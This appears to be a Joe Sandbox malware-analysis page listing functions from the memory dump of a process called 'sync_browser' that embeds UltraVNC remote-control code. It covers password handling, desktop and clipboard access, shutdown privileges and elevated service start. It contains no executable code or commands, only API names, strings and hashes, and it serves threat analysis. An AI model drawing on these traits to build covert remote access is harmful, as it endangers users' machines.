Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: DesktopOpen$ClipboardCloseInput
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 2872304593-3977938048
Opcode ID: 41fdc7f4038987e70fb881bd2a8b0bfd294fc6fa25dfdabd30afa84ad6723627
Instruction ID: 704e577c2c31136961fbf7ae79a1e2ff5d0947e5178f667aafe84692ff8a23d4
Opcode Fuzzy Hash: 41fdc7f4038987e70fb881bd2a8b0bfd294fc6fa25dfdabd30afa84ad6723627
Instruction Fuzzy Hash: CF12A332A0C6C1C5EB61BB35C8587FDA7A1EB85B84F944139DA4D4B7A9CF38E941C720

Function 00007FF740019260 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 83libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF7400192B8
GetVersionExA.KERNEL32 ref: 00007FF7400192CF
GetModuleHandleA.KERNEL32 ref: 00007FF7400192F8
GetProcAddress.KERNEL32 ref: 00007FF740019308
GetSystemInfo.KERNEL32 ref: 00007FF74001931C

Strings

kernel32.dll, xrefs: 00007FF7400192F1
GetNativeSystemInfo, xrefs: 00007FF7400192FE

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Version$AddressHandleInfoModuleProcSystem
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 335284197-192647395
Opcode ID: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
Instruction ID: 9a49fa11eca59e99104c8f3727c03633e69208df76e79b7d97196a66d5228842
Opcode Fuzzy Hash: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
Instruction Fuzzy Hash: AA31FC21A0C682C6FA74BB50E45577AB3A0FB95704FC00035E69E86BADEF6DF5458B20

Function 00007FF740021620 Relevance: 12.3, APIs: 5, Strings: 3, Instructions: 323COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF74002168C

Part of subcall function 00007FF7400B8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7400B8C64
Part of subcall function 00007FF7400B8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749,?,?,?,00007FF7400C77F3), ref: 00007FF7400B8C89
Part of subcall function 00007FF7400B8C34: _callnewh.LIBCMT ref: 00007FF7400B8CA2
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CAD
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CB8

EnterCriticalSection.KERNEL32 ref: 00007FF740021813
LeaveCriticalSection.KERNEL32 ref: 00007FF74002183B

Part of subcall function 00007FF740022CC0: malloc.LIBCMT ref: 00007FF740022D28
Part of subcall function 00007FF740022CC0: GetCurrentProcessId.KERNEL32 ref: 00007FF740022D6C
Part of subcall function 00007FF740022CC0: rand.LIBCMT ref: 00007FF740022D90

free.LIBCMT ref: 00007FF740021A63
free.LIBCMT ref: 00007FF740021AB0

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF74002166F
i, xrefs: 00007FF740021809
unable to determine legacy authentication method, xrefs: 00007FF74002173F

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection_errnofreemalloc$AllocCurrentEnterHeapLeaveProcess_callnewhrand
String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$unable to determine legacy authentication method
API String ID: 2847437661-1576074771
Opcode ID: ed06f703ebe15f3b9a86eda3ec199afb5f7cabdb112eedb8e0fa24d8d9d6ed7a
Instruction ID: c91dec98b230de2822a517a6d40444ffce215ebe86e44072b57621032afa90d2
Opcode Fuzzy Hash: ed06f703ebe15f3b9a86eda3ec199afb5f7cabdb112eedb8e0fa24d8d9d6ed7a
Instruction Fuzzy Hash: 25D18022B0C642C5F714BBB594543FDA7A2AB84764F944239DE2E57BE9CF38E841C360

Function 00007FF740057650 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 47registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF74000D390: GetModuleFileNameA.KERNEL32 ref: 00007FF74000D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057689
RegCreateKeyExA.ADVAPI32 ref: 00007FF7400576DD
RegCreateKeyExA.ADVAPI32 ref: 00007FF740057722

Strings

UseRegistry, xrefs: 00007FF740057678
mslogon, xrefs: 00007FF7400576F3
admin, xrefs: 00007FF74005767F
Software\UltraVNC, xrefs: 00007FF7400576B3

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Create$FileModuleNamePrivateProfile
String ID: Software\UltraVNC$UseRegistry$admin$mslogon
API String ID: 27673491-2056936749
Opcode ID: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
Instruction ID: 7616bb50f81eebdcf2eeba067f4428cfa83b04adf2b6476912f020a467c1fd07
Opcode Fuzzy Hash: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
Instruction Fuzzy Hash: A821ED3661CB86D6E760AF10F4907AAB765FB88354FC01136EA8D02B69DF3CE1148B50

Function 00007FF740013550 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF740013569
OpenProcessToken.ADVAPI32 ref: 00007FF74001357C
LookupPrivilegeValueA.ADVAPI32 ref: 00007FF740013594
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7400135C5
GetVersionExA.KERNEL32 ref: 00007FF7400135DC
ExitWindowsEx.USER32 ref: 00007FF7400135F1

Strings

SeShutdownPrivilege, xrefs: 00007FF74001358B

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueVersionWindows
String ID: SeShutdownPrivilege
API String ID: 337752880-3733053543
Opcode ID: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
Instruction ID: 54c717ff79099de132d54b02f424b65ef8d066bb9c1a674aa4bb7021ba79d370
Opcode Fuzzy Hash: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
Instruction Fuzzy Hash: E8113A71A1CA42C6E750FB60F4597AAB3A0FF84B44F800035E68E46B68DF7CE049CB20

Function 00007FF740031660 Relevance: 12.3, APIs: 8, Instructions: 292windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00007FF74003169D
IsWindowVisible.USER32 ref: 00007FF7400316B9
GetWindowRect.USER32 ref: 00007FF7400316CA
IsWindowVisible.USER32 ref: 00007FF74003172F
GetWindowRect.USER32 ref: 00007FF740031744

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Window$RectVisible$Foreground
String ID:
API String ID: 2499709836-0
Opcode ID: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
Instruction ID: 2aded9170791a8ce83666914f3efc21eed0631fea11f46406cf2d5b20be40717
Opcode Fuzzy Hash: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
Instruction Fuzzy Hash: 30D16B32B08A928FEB14EFA9D5406EC77B2BB88B48B504139DE0D67B5CDE34A441C751

Function 00007FF7400B7220 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7400C29F7
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7400C2A16
RtlVirtualUnwind.KERNEL32 ref: 00007FF7400C2A62
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7400C4917), ref: 00007FF7400C2AD4
SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7400C4917), ref: 00007FF7400C2AEC
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7400C4917), ref: 00007FF7400C2AF9
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7400C4917), ref: 00007FF7400C2B12
TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7400C4917), ref: 00007FF7400C2B20

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
Instruction ID: c86c087e038f98e2372bcabaf44f2bfb42cf9553ce6bd9476a6349f9426b02fb
Opcode Fuzzy Hash: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
Instruction Fuzzy Hash: 9831AE3590CA42C5EB54BB54F8403A9F3A5FB89754F900136EA8E46BA9DF7CE0548B24

Function 00007FF7400134B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7400134C3
OpenProcessToken.ADVAPI32 ref: 00007FF7400134D6
LookupPrivilegeValueA.ADVAPI32 ref: 00007FF7400134EE
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF74001351F
ExitWindowsEx.USER32 ref: 00007FF74001352E

Strings

SeShutdownPrivilege, xrefs: 00007FF7400134E5

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 1314775590-3733053543
Opcode ID: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
Instruction ID: 15bf3eadd278ce25d9c30cb8fd7c83911e178a5659ff75a2062372b6faf4cde0
Opcode Fuzzy Hash: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
Instruction Fuzzy Hash: 42012D75A1CA42C1E750FB20F8556AAB7A1FF88B44F845035E68E47768DF3DE048CB20

Function 00007FF7400099C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF7400099E9
GetForegroundWindow.USER32 ref: 00007FF7400099F8
ShellExecuteExA.SHELL32 ref: 00007FF740009A47

Strings

runas, xrefs: 00007FF740009A03
p, xrefs: 00007FF7400099EF
-startservice, xrefs: 00007FF740009A2A

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -startservice$p$runas
API String ID: 3648085421-278061118
Opcode ID: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
Instruction ID: 07b222c7f130084cdcebb9b6f21c5c33985d15b1f66a6ff94ecb7cc411839d94
Opcode Fuzzy Hash: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
Instruction Fuzzy Hash: C801DA3661CB81C5E760AF10F49439AB3A4FB89748F900236E6CD02B68DF7DE114CB50

Function 00007FF7400C8C90 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

__tzset.LIBCMT ref: 00007FF7400C8DF3
_get_daylight.LIBCMT ref: 00007FF7400C8DFC
_get_daylight.LIBCMT ref: 00007FF7400C8E0D
_get_daylight.LIBCMT ref: 00007FF7400C8E1E
_isindst.LIBCMT ref: 00007FF7400C8EDA

Part of subcall function 00007FF7400C4930: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7400C49D2), ref: 00007FF7400C4948

_errno.LIBCMT ref: 00007FF7400C8F2E

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _get_daylight$CurrentProcess__tzset_errno_isindst
String ID:
API String ID: 1870958493-0
Opcode ID: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
Instruction ID: 8ba70a13b56efe58acc047b42c9848d8b7922da93797bc93ff88a4e2f16cf363
Opcode Fuzzy Hash: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
Instruction Fuzzy Hash: 3C71E873F1C10286F72CFB2499516BCA696BB54348F948139EE0D86BEDDF38B5018714

Function 00007FF7400313A0 Relevance: 9.0, APIs: 6, Instructions: 42clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF7400313B0
EmptyClipboard.USER32 ref: 00007FF7400313BA
GlobalAlloc.KERNEL32 ref: 00007FF7400313DF
GlobalLock.KERNEL32 ref: 00007FF7400313F0
GlobalUnlock.KERNEL32 ref: 00007FF740031411
SetClipboardData.USER32 ref: 00007FF74003141F

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ClipboardGlobal$AllocDataEmptyLockOpenUnlock
String ID:
API String ID: 2715784024-0
Opcode ID: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
Instruction ID: 8dc2d84819a68df231291362ce279935805b5ebf931cfa9b2395a4b1f4618243
Opcode Fuzzy Hash: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
Instruction Fuzzy Hash: FC019210B2C642C2FA157B6569182B5A291AF49BE1F482134DD2E477E8DE3CF0458230

Function 00007FF740057BD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF74000D390: GetModuleFileNameA.KERNEL32 ref: 00007FF74000D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057C09

Part of subcall function 00007FF740057650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057689
Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7400576DD
Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF740057722

Part of subcall function 00007FF7400578E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF74005792E
Part of subcall function 00007FF7400578E0: RegQueryValueExA.ADVAPI32 ref: 00007FF74005796A
Part of subcall function 00007FF7400578E0: RegQueryValueExA.ADVAPI32 ref: 00007FF7400579B2

Strings

UseRegistry, xrefs: 00007FF740057BF8
admin, xrefs: 00007FF740057BFF
group1, xrefs: 00007FF740057C2C, 00007FF740057C63

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$CreateQueryValue$FileModuleName
String ID: UseRegistry$admin$group1
API String ID: 1728753321-252764636
Opcode ID: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
Instruction ID: 2dc0d22590bd82420eadeba20d3c11178b24dacef01301587d551903e013d169
Opcode Fuzzy Hash: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
Instruction Fuzzy Hash: BF11B721A1C986D1EA60FB24F4A17F9A3A1FF98744FC50036D64D467BADE3CF1049B60

Function 00007FF740057C90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

